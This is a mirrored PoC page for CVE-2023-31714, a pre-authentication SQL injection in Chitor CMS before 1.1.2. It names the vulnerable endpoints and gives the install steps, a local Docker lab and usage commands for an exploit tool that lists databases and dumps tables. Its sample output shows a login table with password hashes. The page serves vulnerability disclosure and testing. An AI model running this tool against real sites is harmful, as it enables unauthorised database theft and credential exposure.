Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-31714 PoC — Chitor CMS SQL注入漏洞

Source
Associated Vulnerability
Title:Chitor CMS SQL注入漏洞 (CVE-2023-31714)
Description:Chitor CMS是Waqas Ahmad个人开发者的一个学校管理系统。 Chitor CMS v1.1.2之前版本存在SQL注入漏洞,攻击者利用该漏洞可以执行SQL注入。
Readme
<a target="_blank" href="https://img.shields.io/badge/platform-linux-success.svg" rel="noopener noreferrer">
    <img src="https://img.shields.io/badge/platform-linux-success.svg">
</a>
<a target="_blank" href="https://img.shields.io/badge/version-1.1-yellow" rel="noopener noreferrer">
    <img src="https://img.shields.io/badge/version-1.1-yellow">
</a>
<a href="https://www.python.org/" rel="nofollow">
    <img src="https://img.shields.io/badge/python-3.7-red">
</a>
<h1>CVE-2023-31714 - Chitor-CMS < 1.1.2 Pre-Auth SQL Injection</h1>
<strong>Found by msd0pe</strong><br />
https://github.com/waqaskanju/Chitor-CMS<br />
Project by waqaskanju

<h2>chitor1.1.py (Patched since 69d3442 commit)</h2>
<strong>2023/04/13</strong><br />
SQL Injection was found in the /edit_school.php?id= endpoint and doesn't need any authentication.

<h2>chitor1.0.py (Became a Post-Auth SQL Injection since 5f76192 commit)</h2>
<strong>2023/04/09</strong><br />
SQL Injections was found in multiple endpoints suchs as /add_school_class.php?school= and doesn't need any authentifcation. Since 5f76192 commit, theses endpoints verify that the logged in user has editing rights. This check was already in place before but was not functional.

<h1>Installation</h1>

```bash
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/chitor-sqli
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh
```

<h1>Usage</h1>

```bash
Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Examples:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Source code put in public domain by msd0pe,no Copyright
  Any malicious or illegal activity may be punishable by law
  Use at your own risk
```

<h1>Example</h1>

```bash
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
```
File Snapshot

[4.0K] /data/pocs/6720367d4effd310a3d3a697f53f45417e4772f0 ├── [7.1K] chitor1.0.py ├── [7.0K] chitor1.1.py ├── [ 268] clean.sh ├── [ 672] docker-compose.yml ├── [4.0K] images │   ├── [4.0K] mariadb │   │   ├── [116K] chitor_db.sql │   │   └── [ 69] Dockerfile │   ├── [4.0K] nginx │   │   ├── [ 546] default.conf │   │   └── [ 60] Dockerfile │   └── [4.0K] php │   └── [ 90] Dockerfile ├── [3.0K] README.md ├── [ 301] run.sh └── [4.0K] sources ├── [4.9M] Chitor-CMS-for1.0.tar └── [1.4M] Chitor-CMS-for1.1.tar 5 directories, 13 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.